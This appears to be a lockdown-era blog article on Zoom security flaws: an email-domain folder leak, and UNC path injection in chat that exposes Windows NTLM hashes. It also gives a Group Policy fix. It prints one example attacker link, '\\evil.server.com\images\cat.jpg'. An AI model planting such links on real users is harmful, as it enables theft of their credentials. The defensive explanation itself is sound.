Zoom video conferencing has been the most buzzing app in this lockdown be starting from meetings to online classes. Due to the ongoing lockdown globally, Zoom's popularity quickly shot up too.
Email addresses, profile photos leak
Users who share the same email domain will find their email addresses in a universal company folder which is visible to all the members. This doesn't work for major email clients like Gmail, Yahoo, Hotmail or Outlook. But this isn't the case for users who use small email clients. It happened to Dutch Zoom users who could see information like email addresses, usernames and even photos of them and others in the company folder. These users reportedly used ISP-provided email addresses.
Here's how Attackers could steal Windows passwords from ZOOM:
When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.
Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.
The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”
And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
Remedy Until Zoom makes a fix,
The issue needs to be fixed by Zoom but until then, you can enable a group policy that prevents NTML credentials from automatically being sent as described. You can find this under Group Policy editor, and change it to “Deny All.”
Go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.
ALTERNATIVES CONFERENCING APPS FOR USERS:
Cisco Webex Meetings
Skype Meet Now
If you don't want a solution just to make video calls, you can look at Microsoft Teams. It is also available for free during the pandemic. The free version brings unlimited chat and search, group and one-on-one audio and video calling.
You can make video calls with up to 10 participants or chat with up to 150 participants at once. Google also lets you host video calls or talk with your colleagues through text messages using a mobile device..